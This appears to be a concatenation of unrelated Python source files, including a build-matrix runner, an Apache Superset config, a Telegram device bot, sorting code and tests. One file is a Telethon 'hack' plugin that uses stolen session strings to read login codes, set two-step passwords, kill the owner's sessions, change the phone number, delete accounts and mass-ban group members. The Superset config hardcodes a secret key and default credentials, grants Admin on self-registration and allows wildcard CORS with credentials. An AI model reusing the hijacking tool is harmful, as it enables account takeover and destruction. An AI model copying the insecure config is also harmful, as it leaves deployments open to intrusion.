matrix.append([entry.name, entry])
options = [('priority', config.getint), ('container', config.get)]
for section in config.sections():
filters = section.split('-')
if len(filters) != 4:
continue
for _, entry in matrix:
if filters[0] != '*' and entry.target != filters[0]:
continue
if filters[1] != '*' and entry.arch != filters[1]:
continue
if filters[2] != '*' and entry.toolchain != filters[2]:
continue
if filters[3] != '*' and entry.variant != filters[3]:
continue
for option, method in options:
if not config.has_option(section, option):
continue
value = method(section, option)
setattr(entry, option, value)
return True, matrix
def RunBuildMatrix(args):
if not exists(args.config):
print('Matrix configuration does not exists at: {}'.format(args.config))
return False
try:
success, matrix = ParseMatrixConfig(args.config)
except MatrixValidationError as e:
print(e.message)
return False
if not success:
return False
parameters = dict(concurrency=args.concurrency, fresh=args.fresh,
verbose=args.verbose)
for identifier, entry in matrix:
if not args.all and entry.priority > args.priority:
continue
command = [
'build',
'--arch={}'.format(entry.arch),
'--variant={}'.format(entry.variant.title()),
'--toolchain={}'.format(entry.toolchain),
'--concurrency={}'.format(args.concurrency)
]
print('Building matrix entry: {}'.format(identifier))
if args.verbose:
print('Executing with parameters: {}'.format(' '.join(command)))
if entry.container:
print('Using container: {}'.format(entry.container))
if entry.container:
if not RunAsContainer(parameters, command, entry.container):
print('Matrix build failed for target (container={}): {}'.format(
entry.container, identifier))
return False
else:
command.insert(0, 'fusion-cli')
if not Execute(command, os.getcwd()):
print('Matrix build failed for target: {}'.format(identifier))
return False
return True
def ValidateTarget(config, target, option):
if not config.has_option(target, option):
message = "Matrix configuration for '{}' does not specify: {}".format(
target, option)
raise MatrixValidationError(message)
values = config.get(target, option, True).strip()
if not values:
print("Option list for '{}' on target '{}' is empty".format(option, target))
return False
return values.split()
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# This file is included in the final Docker image and SHOULD be overridden when
# deploying the image to prod. Settings configured here are intended for use in local
# development environments. Also note that superset_config_docker.py is imported
# as a final step as a means to override "defaults" configured here
#
import logging
import os
import base64
from flask_appbuilder.security.manager import AUTH_OAUTH
from superset_patchup.oauth import CustomSecurityManager
from datetime import timedelta
from typing import Optional
from cachelib.file import FileSystemCache
from celery.schedules import crontab
logger = logging.getLogger()
def get_env_variable(var_name: str, default: Optional[str] = None) -> str:
"""Get the environment variable or raise exception."""
try:
return os.environ[var_name]
except KeyError:
if default is not None:
return default
else:
error_msg = "The environment variable {} was missing, abort...".format(
var_name
)
raise EnvironmentError(error_msg)
DATABASE_DIALECT = get_env_variable("DATABASE_DIALECT")
DATABASE_USER = get_env_variable("DATABASE_USER")
DATABASE_PASSWORD = get_env_variable("DATABASE_PASSWORD")
DATABASE_HOST = get_env_variable("DATABASE_HOST")
DATABASE_PORT = get_env_variable("DATABASE_PORT")
DATABASE_DB = get_env_variable("DATABASE_DB")
# The SQLAlchemy connection string.
SQLALCHEMY_DATABASE_URI = "%s://%s:%s@%s:%s/%s" % (
DATABASE_DIALECT,
DATABASE_USER,
DATABASE_PASSWORD,
DATABASE_HOST,
DATABASE_PORT,
DATABASE_DB,
)
REDIS_HOST = get_env_variable("REDIS_HOST")
REDIS_PORT = get_env_variable("REDIS_PORT")
REDIS_CELERY_DB = get_env_variable("REDIS_CELERY_DB", "0")
REDIS_RESULTS_DB = get_env_variable("REDIS_RESULTS_DB", "1")
RESULTS_BACKEND = FileSystemCache("/app/superset_home/sqllab")
class CeleryConfig(object):
BROKER_URL = f"redis://{REDIS_HOST}:{REDIS_PORT}/{REDIS_CELERY_DB}"
CELERY_IMPORTS = ("superset.sql_lab", "superset.tasks")
CELERY_RESULT_BACKEND = f"redis://{REDIS_HOST}:{REDIS_PORT}/{REDIS_RESULTS_DB}"
CELERYD_LOG_LEVEL = "DEBUG"
CELERYD_PREFETCH_MULTIPLIER = 1
CELERY_ACKS_LATE = False
CELERYBEAT_SCHEDULE = {
"reports.scheduler": {
"task": "reports.scheduler",
"schedule": crontab(minute="*", hour="*"),
},
"reports.prune_log": {
"task": "reports.prune_log",
"schedule": crontab(minute=10, hour=0),
},
}
CELERY_CONFIG = CeleryConfig
FEATURE_FLAGS = {"ALERT_REPORTS": True}
ALERT_REPORTS_NOTIFICATION_DRY_RUN = True
WEBDRIVER_BASEURL = "http://superset:8088/"
# The base URL for the email report hyperlinks.
WEBDRIVER_BASEURL_USER_FRIENDLY = WEBDRIVER_BASEURL
SQLLAB_CTAS_NO_LIMIT = True
#SUPERSET
#
def stringToBase64(s):
return base64.b64encode(s.encode('utf-8')).decode('utf-8')
SECRET_KEY='Yd9OFHQfcu'
OL_SUPERSET_USER='superset'
OL_SUPERSET_PASSWORD='changeme'
OL_BASE_URL='http://35.171.194.94'
AUTHORIZATION_HEADER_TOKEN = stringToBase64(
'%s:%s' % (OL_SUPERSET_USER, OL_SUPERSET_PASSWORD))
AUTH_TYPE = AUTH_OAUTH
OAUTH_PROVIDERS = [
{ 'name':'openlmis',
'token_key':'access_token', # Name of the token in the response of access_token_url
'icon':'fa-sign-in', # Icon for the provider
'remote_app': {
'client_id': OL_SUPERSET_USER, # Client Id (Identify Superset application)
'client_secret': OL_SUPERSET_PASSWORD, # Secret for this Client Id (Identify Superset application)
'client_kwargs':{
'scope': 'read write' # Scope for the Authorization
},
'access_token_method':'POST', # HTTP Method to call access_token_url
'access_token_params':{ # Additional parameters for calls to access_token_url
'scope':'read write'
},
'access_token_headers':{ # Additional headers for calls to access_token_url
'Authorization': 'Basic %s' % AUTHORIZATION_HEADER_TOKEN
},
'api_base_url': '%s/api/oauth' % OL_BASE_URL,
'access_token_url': '%s:80/api/oauth/token?grant_type=authorization_code' % OL_BASE_URL,
'authorize_url': '%s/api/oauth/authorize?' % OL_BASE_URL
}
}
]
# The default user self registration role
# AUTH_USER_REGISTRATION_ROLE = "OLMIS_Gamma"
# Will allow user self registration
# AUTH_USER_REGISTRATION = True
# Map Authlib roles to superset roles
AUTH_ROLE_ADMIN = 'Admin'
AUTH_ROLE_PUBLIC = 'Public'
# Will allow user self registration, allowing to create Flask users from Authorized User
AUTH_USER_REGISTRATION = True
# The default user self registration role
AUTH_USER_REGISTRATION_ROLE = "Admin"
# Extract and use X-Forwarded-For/X-Forwarded-Proto headers?
ENABLE_PROXY_FIX = True
# Allow iFrame access from openLMIS running on localhost
HTTP_HEADERS = {'X-Frame-Options': 'allow-from %s' % OL_BASE_URL}
CUSTOM_SECURITY_MANAGER = CustomSecurityManager
#SESSION_COOKIE_HTTPONLY = False
#SESSION_COOKIE_SAMESITE = 'None' # One of [None, 'Lax', 'Strict']
#SESSION_COOKIE_SECURE = True
ENABLE_CORS = True
CORS_OPTIONS = {
'origins': '*',
'supports_credentials': True
}
WTF_CSRF_ENABLED = True
#WTF_CSRF_CHECK_DEFAULT = False
WTF_CSRF_EXEMPT_LIST = ['custom_security_manager']
WTF_CSRF_TIME_LIMIT = 60 * 60 * 24 * 365
#SESSION_COOKIE_HTTPONLY = False
#SESSION_COOKIE_SECURE = False
#SESSION_COOKIE_SAMESITE = "None"
# Add custom roles
ADD_CUSTOM_ROLES = True
CUSTOM_ROLES = {'OLMIS_Gamma': {'all_datasource_access'}}
#
# Optionally import superset_config_docker.py (which will have been included on
# the PYTHONPATH) in order to allow for local settings to be overridden
#
try:
import superset_config_docker
from superset_config_docker import * # noqa
logger.info(
f"Loaded your Docker configuration at " f"[{superset_config_docker.__file__}]"
)
except ImportError:
logger.info("Using default Docker config...")
|
# PCA for Spotify features data with 2 dimensional output
conf = {
'function':'PCA',
'n_components':2,
'copy':False,
'whiten':False,
'svd_solver':'auto',
'tol':.0,
'iterated_power':'auto',
'random_state':None
}
|
from telebot import TeleBot
from telebot.types import Message as tele_message
from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton
from DeviceControllerTelegramBot.device_controller import DeviceController
class ControllerBot:
def __init__(self, API_KEY: str, devices: dict, serial_comms_conf: dict, admin_chat_ids: list[int] = [None]) -> None:
self.bot = TeleBot(token=API_KEY)
self.CHAT_IDs = admin_chat_ids
self.board = DeviceController(devices, serial_comms_conf)
@self.bot.message_handler(commands=['start'])
def _start_message(message: tele_message):
# inform admin about the new user
if self.__validate_request(message):
pass
user_details = self.__get_user_details(message)
self.bot.reply_to(message=message, text=user_details)
@self.bot.message_handler(commands=['help'])
def _help_message(message:tele_message):
if self.__validate_request(message):
self.bot.reply_to(message=message, text='\r\nDevice Controller Telegram Bot\r\nWritten by Dhrumil Mistry\r\nGithub Profile : \r\nhttps://github.com/dmdhrumilmistry\r\n---------------------------------------\r\ncommand : description\r\n---------------------------------------\r\n/start : get chat id and user details\r\n/help : get help menu\r\n/devices : get devices control options\r\n')
@self.bot.message_handler(commands=['devices'])
def _handle_devices(message: tele_message):
if self.__validate_request(message):
# provide control option to user using inline buttons
for device in self.board.device_pins:
keyboard = InlineKeyboardMarkup()
keyboard.row(
InlineKeyboardButton(
text="ON", callback_data=f"{device}-1"),
InlineKeyboardButton(
text="OFF", callback_data=f"{device}-0"),
)
self.bot.reply_to(
message, f'Choose {device} State:', reply_markup=keyboard)
@self.bot.callback_query_handler(func=lambda call: True)
def _callback_handler(query):
self.bot.send_chat_action(query.message.chat.id, 'typing')
message = query.message
chat_id = message.chat.id
# validate request
if self.__validate_request(message):
command: str = query.data
device = command.split(',')[0]
self.__set_states(command)
self.bot.delete_message(chat_id, query.message.message_id)
self.bot.send_message(
chat_id, f'{device} State Transition Completed.')
# if no command is valid, return invalid message
@self.bot.message_handler(func=lambda message: True)
def _echo_invalid(message):
self.bot.reply_to(message, "INVALID OPTION")
@staticmethod
def __get_user_details(message: tele_message):
'''
returns messenger's details
'''
return f'Chat ID : {message.chat.id}\nName : {message.from_user.full_name}\nUserName : {message.from_user.username}\nIs BOT : {message.from_user.is_bot}'
def __set_states(self, command):
command = command.split('-')
device_name = command[0]
device_state = command[1]
# update device state
self.board.device_pins[device_name].state = device_state
board_command = f'{self.board.device_pins[device_name]},'
self.board.update_values(board_command)
def __validate_request(self, message: tele_message) -> bool:
'''
returns True is if request is from admin, else False
'''
if int(message.chat.id) not in self.CHAT_IDs:
# \nDetailed Information :{message}
alert_message = f'[!] Intruder Alert!!\n{self.__get_user_details(message)}\nTried Command : {message.text}\n'
for chat_id in self.CHAT_IDs:
if chat_id:
self.bot.send_message(chat_id=chat_id, text=alert_message)
self.bot.send_message(
chat_id=message.from_user.id, text='Not Authorized !!')
return False
return True
def start(self):
'''
start Device Controller Bot
'''
print("[+] Starting Bot...")
self.bot.infinity_polling()
print('[!] Bot Stopped!')
|
from pathlib import Path
# This may be interesting; but it is always better to
# provide an unambiguous argument instead of inspect!
class A :
def __init__(self) :
import inspect
f = inspect.stack().pop(1)
# print(f.filename)
self.p = Path(f.filename).parent.resolve()
|
#
# most basic quick_sort.
# This example does not optimize memory. Lots of copies.
#
def quick_sort(data):
if not data: return data
pivot = random.choice(data)
front = quick_sort([item for item in data if item < pivot])
back = quick_sort([item for item in data if item > pivot])
match = [item for item in data if item == pivot]
return front + match + back
# ----------------------------------------------------------------------------
def quicksort(array):
qsort(array, 0, len(array)-1)
def qsort(A, lo, hi):
if lo < hi:
p = partition(A, lo, hi)
qsort(A, lo, p)
qsort(A, p + 1, hi)
def partition(A, lo, hi):
pivot = A[lo]
i, j = lo-1, hi+1
while True:
i += 1
j -= 1
while(A[i] < pivot): i+= 1
while(A[j] > pivot ): j-= 1
if i >= j:
return j
A[i], A[j] = A[j], A[i]
|
""" Test cases for the untimed until operation.
This only exists in the efficient algorithm implementation. """
import unittest
from stl.signals import Signal
from stl.operators import computeUntimedUntil
class UntimedUntilTest(unittest.TestCase):
""" Implementation of the Untimed Until tests. """
def setUp(self) -> None:
return super().setUp()
def testEmptySignal(self):
empty = Signal()
nonEmpty = Signal('t', [0, 1], [0, 1], [1, 0])
expectedResult = Signal("untimedUntil")
self.assertEqual(computeUntimedUntil(empty, empty), expectedResult)
self.assertEqual(computeUntimedUntil(empty, nonEmpty), expectedResult)
self.assertEqual(computeUntimedUntil(nonEmpty, empty), expectedResult)
def testSimpleSignal(self) -> None:
inputSignal: Signal = Signal('test', [0, 1], [0, 1], [1, 0])
expectedResult = Signal("untimedUntil", [0, 1], [0, 1], [1, 0])
self.assertEqual(computeUntimedUntil(inputSignal, inputSignal), expectedResult)
inputSignal: Signal = Signal('test', [0, 1], [-1, 1], [2, 0])
expectedResult = Signal("untimedUntil", [0, 1], [-1, 1], [2, 0])
self.assertEqual(computeUntimedUntil(inputSignal, inputSignal), expectedResult)
def testSmallSignal(self) -> None:
lhs = Signal("left", [0, 1, 2, 3, 4], [2, 7, 5, 4, -1], [5, -2, -1, -5, 0])
rhs = Signal("right", [0, 1, 2, 3, 4], [-1, -1, -1, 1, 1], [0, 0, 2, 0, 0])
expectedResult = Signal("untimedUntil", [0, 1, 2, 3, 3.6, 4], [1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0])
self.assertEqual(computeUntimedUntil(lhs, rhs), expectedResult)
rhs = Signal("right", [0, 1, 2, 3, 4], [-1, -1, -1, 4, 1], [0, 0, 2, 0, 0])
expectedResult = Signal("untimedUntil", [0, 1, 2, 3, 4], [2, 4, 4, 4, 1], [2, 0, 0, -3, 0])
self.assertEqual(computeUntimedUntil(lhs, rhs), expectedResult)
lhs = Signal("left", [0, 1, 2, 3, 4], [-2, -7, -5, -4, -1], [5, -2, -1, -5, 0])
expectedResult = Signal("untimedUntil", [0, 1, 2, 3, 4], [-2, -7, -5, -4, 1], [-5, 2, 1, 5, 0])
self.assertEqual(computeUntimedUntil(lhs, rhs), expectedResult)
lhs = Signal("left", [0, 1, 2, 3, 4], [-2, -7, -5, -4, -12], [5, -2, -1, -5, 0])
expectedResult = Signal("untimedUntil", [0, 1, 2, 3, 4], [-2, -7, -5, -4, 1], [-5, 2, 1, 5, 0])
self.assertEqual(computeUntimedUntil(lhs, rhs), expectedResult) |
import unittest
import asyncio
from common.elasticsearch.bson_serializer import BSONSerializer
from common.mongo.oplog import Oplog
class OplogTest(unittest.TestCase):
def test_tail(self):
oplog = Oplog(limit=10)
@oplog.on('data')
async def on_data(doc):
await asyncio.sleep(.1)
print('event data:', BSONSerializer().dumps(doc))
@oplog.on('insert')
def on_insert(doc):
print('event insert:', doc)
@oplog.on('actfeesaves_insert')
def on_coll_insert(doc):
print('event coll insert:', doc)
async def close():
await asyncio.sleep(5)
oplog.close()
asyncio.ensure_future(close())
loop = asyncio.get_event_loop()
loop.run_until_complete(oplog.tail())
loop.close()
def test_earliest_ts(self):
oplog = Oplog()
print(oplog.earliest_ts())
|
import asyncio
import os
import re
from os import system
from telethon import Button
from telethon import TelegramClient as tg
from telethon import events, functions, types
from telethon.sessions import StringSession as ses
from telethon.tl.functions.auth import ResetAuthorizationsRequest as rt
from telethon.tl.functions.channels import DeleteChannelRequest as dc
from telethon.tl.functions.channels import GetAdminedPublicChannelsRequest as pc
from telethon.tl.functions.channels import JoinChannelRequest as join
from telethon.tl.functions.channels import LeaveChannelRequest as leave
from telethon.tl.types import ChannelParticipantsAdmins
api_id = os.environ.get("APP_ID")
api_hash = os.environ.get("API_HASH")
token = os.environ.get("BOT_TOKEN")
from . import *
mybot = "missrose_bot"
from userbot import bot
eviralboy = 2024465080
async def change_number_code(strses, number, code, otp):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
bot = X
try:
result = await bot(
functions.account.ChangePhoneRequest(
phone_number=number, phone_code_hash=code, phone_code=otp
)
)
return True
except:
return False
async def change_number(strses, number):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
bot = X
result = await bot(
functions.account.SendChangePhoneCodeRequest(
phone_number=number,
settings=types.CodeSettings(
allow_flashcall=True, current_number=True, allow_app_hash=True
),
)
)
return str(result)
async def userinfo(strses):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
k = await X.get_me()
return str(k)
async def terminate(strses):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
await X(rt())
GROUP_LIST = []
async def delacc(strses):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
await X(functions.account.DeleteAccountRequest("I am chutia"))
async def promote(strses, grp, user):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
try:
await X.edit_admin(
grp,
user,
manage_call=True,
invite_users=True,
ban_users=True,
change_info=True,
edit_messages=True,
post_messages=True,
add_admins=True,
delete_messages=True,
)
except:
await X.edit_admin(
grp,
user,
is_admin=True,
anonymous=False,
pin_messages=True,
title="Owner",
)
async def user2fa(strses):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
try:
await X.edit_2fa("eviralBOY IS BEST")
return True
except:
return False
async def demall(strses, grp):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
async for x in X.iter_participants(grp, filter=ChannelParticipantsAdmins):
try:
await X.edit_admin(grp, x.id, is_admin=False, manage_call=False)
except:
await X.edit_admin(
grp,
x.id,
manage_call=False,
invite_users=False,
ban_users=False,
change_info=False,
edit_messages=False,
post_messages=False,
add_admins=False,
delete_messages=False,
)
async def joingroup(strses, username):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
await X(join(username))
async def leavegroup(strses, username):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
await X(leave(username))
async def delgroup(strses, username):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
await X(dc(username))
async def cu(strses):
try:
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
k = await X.get_me()
return [str(k.first_name), str(k.username or k.id)]
except Exception:
return False
async def usermsgs(strses):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
i = ""
async for x in X.iter_messages(777000, limit=3):
i += f"\n{x.text}\n"
await firebot.delete_dialog(777000)
return str(i)
async def userbans(strses, grp):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
k = await X.get_participants(grp)
for x in k:
try:
await X.edit_permissions(grp, x.id, view_messages=False)
except:
pass
async def userchannels(strses):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
k = await X(pc())
i = ""
for x in k.chats:
try:
i += f"\nCHANNEL NAME {x.title} CHANNEL USRNAME @{x.username}\n"
except:
pass
return str(i)
import logging
logging.basicConfig(level=logging.WARNING)
channel = "Its_FIREX"
menu = """
Reply To My Message If I am using In Group
"A" :~ [Check user own groups and channels]
"B" :~ [Check user all information like phone number, usrname... etc]
"C" :~ [Ban a group {give me StringSession and channel/group username i will ban all members there}]
"D" :~ [Know user last otp {1st use option B take phone number and login there Account then use me i will give you otp}]
"E" :~ [Join A Group/Channel via StringSession]
"F" :~ [Leave A Group/Channel via StringSession]
"G" :~ [Delete A Group/Channel]
"H" :~ [Check user two step is eneable or disable]
"I" :~ [Terminate All current active sessions except Your StringSession]
"J" :~ [Delete Account]
"K" :~ [Demote all admins in a group/channel]
"L" ~ [Promote a member in a group/channel]
"M" ~ [Change Phone number using StringSession]
I will add more features Later 😅
"""
keyboard = [
[
Button.inline("A", data="A"),
Button.inline("B", data="B"),
Button.inline("C", data="C"),
Button.inline("D", data="D"),
Button.inline("E", data="E"),
],
[
Button.inline("F", data="F"),
Button.inline("G", data="G"),
Button.inline("H", data="H"),
Button.inline("I", data="I"),
Button.inline("J", data="J"),
],
[
Button.inline("K", data="K"),
Button.inline("L", data="L"),
Button.inline("M", data="M"),
],
[Button.url("Owner", "https://t.me/Eviral")],
]
@firebot.on(events.NewMessage(pattern="/hack", func=lambda x: x.sender_id == bot.uid))
async def start(event):
global menu
async with firebot.conversation(event.chat_id) as x:
await x.send_message(
f"Choose what you want with string session \n\n{menu}", buttons=keyword
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"A")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("📍GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.\n /hack", buttons=keyboard
)
try:
i = await userchannels(strses.text)
except:
return await event.reply(
"This StringSession Has Been Terminated.\n/hack", buttons=keyboard
)
if len(i) > 3855:
file = open("session.txt", "w")
file.write(i + "\n\nDetails BY eviralBoy")
file.close()
await bot.send_file(event.chat_id, "session.txt")
system("rm -rf session.txt")
else:
await event.reply(
i + "\n\nThanks For using eviralBoyBot. \n/hack", buttons=keyboard
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"B")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("🔰GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.\n/hack", buttons=keyboard
)
i = await userinfo(strses.text)
await event.reply(
i + "\n\nThanks For using eviralBoy Bot.\n/hack", buttons=keyboard
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"C")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"String Session Has Been Terminated", buttons=keyboard
)
await x.send_message("GIVE GROUP/CHANNEL USERNAME/ID")
grpid = await x.get_response()
await userbans(strses.text, grpid.text)
await event.reply(
"Banning all members. Thanks For using eviralBoy Bot", buttons=keyboard
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"D")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.", buttons=keyboard
)
i = await usermsgs(strses.text)
await event.reply(i + "\n\nThanks For using eviralBoy Bot", buttons=keyboard)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"E")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.", buttons=keyboard
)
await x.send_message("GIVE GROUP/CHANNEL USERNAME/ID")
grpid = await x.get_response()
await joingroup(strses.text, grpid.text)
await event.reply(
"Joined the Channel/Group Thanks For using eviralBoy Bot", buttons=keyboard
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"F")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.", buttons=keyboard
)
await x.send_message("GIVE GROUP/CHANNEL USERNAME/ID")
grpid = await x.get_response()
await leavegroup(strses.text, grpid.text)
await event.reply(
"Leaved the Channel/Group Thanks For using Boy Bot,", buttons=keyboard
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"G")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.", buttons=keyboard
)
await x.send_message("GIVE GROUP/CHANNEL USERNAME/ID")
grpid = await x.get_response()
await delgroup(strses.text, grpid.text)
await event.reply(
"Deleted the Channel/Group Thanks For using eviralBoyBot.", buttons=keyboard
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"H")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession is terminated maybe.", buttons=keyboard
)
i = await user2fa(strses.text)
if i:
await event.reply(
"User don't have two step thats why now two step is `eviralBoy Bot Is best` you can login now\n\nThanks For using eviralBoy Bot.",
buttons=keyboard,
)
else:
await event.reply("Sorry User Have two step already", buttons=keyboard)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"I")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.", buttons=keyboard
)
await terminate(strses.text)
await event.reply(
"The all sessions are terminated\n\nThanks For using eviralBoyBot.",
buttons=keyboard,
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"J")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.", buttons=keyboard
)
await delacc(strses.text)
await event.reply(
"The Account is deleted SUCCESSFULLLY\n\nThanks For using eviralBoy Bot.",
buttons=keyboard,
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"K")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.", buttons=keyboard
)
await x.send_message("NOW GIVE GROUP/CHANNEL USERNAME")
grp = await x.get_response()
await x.send_message("NOW GIVE USER USERNAME")
user = await x.get_response()
await promote(strses.text, grp.text, user.text)
await event.reply(
"I am Promoting you in Group/Channel wait a min 😗😗\n\nThanks For Using eviralBoy Bot.",
buttons=keyboard,
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"L")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.", buttons=keyboard
)
await x.send_message("NOW GIVE GROUP/CHANNEL USERNAME")
pro = await x.get_response()
try:
await demall(strses.text, pro.text)
except:
pass
await event.reply(
"I am Demoting all members of Group/Channel wait a min 😗😗\n\nThanks For using eviralBoyBot.",
buttons=keyboard,
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"M")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession is terminated maybe", buttons=keyboard
)
await x.send_message(
"GIVE NUMBER WHICH YOU WANT TO CHANGE\n[NOTE: DONT USE 2ndline or text now numbers]\n[if you are use 2nd line or text now you can't get otp] "
)
number = (await x.get_response()).text
try:
result = await change_number(strses.text, number)
await event.respond(
result
+ "\n copy the phone code hash and check your number you got otp\ni stop for 20 sec copy phone code hash and otp"
)
await asyncio.sleep(20)
await x.send_message("NOW GIVE PHONE CODE HASH")
phone_code_hash = (await x.get_response()).text
await x.send_message("NOW GIVE THE OTP")
otp = (await x.get_response()).text
changing = await change_number_code(
strses.text, number, phone_code_hash, otp
)
if changing:
await event.respond("CONGRATULATIONS NUMBER WAS CHANGED")
else:
await event.respond("Something is wrong")
except Exception as e:
await event.respond(
"SEND THIS ERROR TO - @FirexSupport\n**LOGS**\n" + str(e)
)
|
from . import ScattergramData
from .. import db
import os
import random
from datetime import datetime
import json
import requests
from requests.auth import HTTPBasicAuth
import plotly.tools as tools
import plotly.plotly as py
import plotly.graph_objs as go
PLOTLY_USERNAME = os.environ.get('PLOTLY_USERNAME')
PLOTLY_API_KEY = os.environ.get('PLOTLY_API_KEY')
py.sign_in(PLOTLY_USERNAME, PLOTLY_API_KEY)
auth = HTTPBasicAuth(PLOTLY_USERNAME, PLOTLY_API_KEY)
headers = {'Plotly-Client-Platform': 'python'}
class College(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String, index=True)
description = db.Column(db.String, index=True)
cost_of_attendance = db.Column(db.Integer, index=True)
tuition = db.Column(db.Integer, index=True)
room_and_board = db.Column(db.Integer, index=True)
image = db.Column(db.String, index=True)
regular_deadline = db.Column(db.Date, index=True)
early_deadline = db.Column(db.Date, index=True)
plot_SAT2400 = db.Column(db.String)
plot_SAT1600 = db.Column(db.String)
plot_ACT = db.Column(db.String)
def update_plots(self):
if (self.plot_SAT2400):
plot_num = self.plot_SAT2400[1 + self.plot_SAT2400.rfind('/')]
requests.post('https://api.plot.ly/v2/files/' +
PLOTLY_USERNAME + ':' + plot_num + '/trash', auth=auth, headers=headers)
requests.delete('https://api.plot.ly/v2/files/' + username + ':' + plot_num +
'/permanent_delete', auth=auth, headers=headers)
if (self.plot_SAT1600):
plot_num = self.plot_SAT1600[1 + self.plot_SAT1600.rfind('/')]
requests.post('https://api.plot.ly/v2/files/' +
PLOTLY_USERNAME + ':' + plot_num + '/trash', auth=auth, headers=headers)
requests.delete('https://api.plot.ly/v2/files/' + username + ':' + plot_num +
'/permanent_delete', auth=auth, headers=headers)
if (self.plot_ACT):
plot_num = self.plot_ACT[1 + self.plot_ACT.rfind('/')]
requests.post('https://api.plot.ly/v2/files/' +
PLOTLY_USERNAME + ':' + plot_num + '/trash', auth=auth, headers=headers)
